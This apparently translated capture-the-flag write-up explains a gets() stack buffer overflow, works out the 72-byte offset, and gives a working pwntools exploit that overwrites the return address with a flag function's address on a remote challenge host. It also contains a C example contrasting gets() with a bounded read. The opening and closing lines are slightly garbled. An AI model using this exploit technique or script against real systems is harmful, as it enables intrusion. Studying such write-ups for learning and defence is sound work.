nc about the address and port number to the
Look at the source file
Here is the familiar gets() function; whenever it appears, a buffer overflow is almost certain. The program gives v5 only 0x40 bytes of storage, so any input longer than 0x40 bytes overflows it. Now look at the sprint() function.
This function is the key point: it fetches the flag. The program shows the address of this function, 0x40060d, so the idea is clear: use the overflow to overwrite the return address with the address of this function. The saved return address sits at rbp + 8, so the overflow offset is 0x40 + 8 = 0x48 = 72 bytes.
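The gets() pattern described above, next to the bounded replacement that removes the bug, as an added example (not code from the challenge binary or the writeup). The 0x40 buffer size and the 72-byte offset come from the writeup; the function names, the fmemopen-based test feed, and the payload shape are assumptions made here.

```c
/* Added example, not the challenge binary's code: the unbounded gets() read the
 * writeup describes beside a bounded replacement. BUF_SIZE (0x40) is from the
 * writeup; function names and the test harness are assumed. */
#define _POSIX_C_SOURCE 200809L   /* for fmemopen */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdbool.h>

#define BUF_SIZE 0x40   /* size of the v5 stack buffer noted in the writeup */

/* Result of a bounded read: bytes stored in dst and whether the input had to
 * be cut off (the exact case that overflows with gets()). */
struct read_result {
    size_t len;
    bool truncated;
};

/* Vulnerable pattern (for comparison only, never compiled in): gets() keeps
 * writing past the end of v5 until it sees a newline, so 0x40 + 8 = 72 bytes
 * reach the saved return address, as the writeup computes.
 *
 *   char v5[BUF_SIZE];
 *   gets(v5);
 */

/* Bounded replacement: stores at most cap-1 bytes, NUL-terminates, drops the
 * newline, and drains the rest of an over-long line so the next read starts
 * on a fresh line instead of on leftover payload bytes. */
struct read_result read_line_bounded(char *dst, size_t cap, FILE *in)
{
    struct read_result r = { 0, false };
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL) {
        if (cap) dst[0] = '\0';
        return r;
    }
    r.len = strlen(dst);
    if (r.len > 0 && dst[r.len - 1] == '\n') {
        dst[--r.len] = '\0';           /* complete line: strip the newline */
        return r;
    }
    /* No newline in dst: either EOF or the line was longer than cap-1 bytes. */
    int c;
    while ((c = fgetc(in)) != EOF && c != '\n')
        r.truncated = true;            /* discard bytes that would have overflowed */
    return r;
}

/* Feed a constructed byte string through the bounded reader (no socket needed). */
struct read_result read_from_string(const char *input, char *dst, size_t cap)
{
    FILE *fp = fmemopen((void *)input, strlen(input), "r");
    if (fp == NULL) {
        struct read_result none = { 0, false };
        return none;
    }
    struct read_result r = read_line_bounded(dst, cap, fp);
    fclose(fp);
    return r;
}

/* Constructed input: n bytes of 'A' plus a newline, the same shape as the
 * writeup's padding, read into a BUF_SIZE buffer. */
struct read_result feed_run(size_t n)
{
    static char v5[BUF_SIZE];
    char *input = malloc(n + 2);
    memset(input, 'A', n);
    input[n] = '\n';
    input[n + 1] = '\0';
    struct read_result r = read_from_string(input, v5, sizeof v5);
    free(input);
    return r;
}

int main(void)
{
    /* 72 bytes is the writeup's overflow offset; with the bounded read only
     * BUF_SIZE-1 bytes are stored and the rest is reported as truncated. */
    struct read_result r = feed_run(72);
    printf("stored %zu bytes, truncated=%d\n", r.len, (int)r.truncated);
    return 0;
}
```

feed_run(72) stores 63 bytes and reports truncation, whereas the original gets() call would have written all 72 bytes and the following 8-byte address onto the stack.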
exp:
```python
#!/usr/bin/env python
# coding=utf-8
from pwn import *

context(arch='amd64', os='linux')

sh = remote('111.198.29.45', 56844)

# address of the flag-printing function from the writeup
target = 0x40060d

# 0x40 bytes of buffer + 8 bytes of saved rbp = 72 bytes of padding,
# then the return address is overwritten with target
# (bytes literal so the concatenation with p64() works on Python 3)
sh.sendline(b'A' * 72 + p64(target))
sh.interactive()
```
Hi mention flag.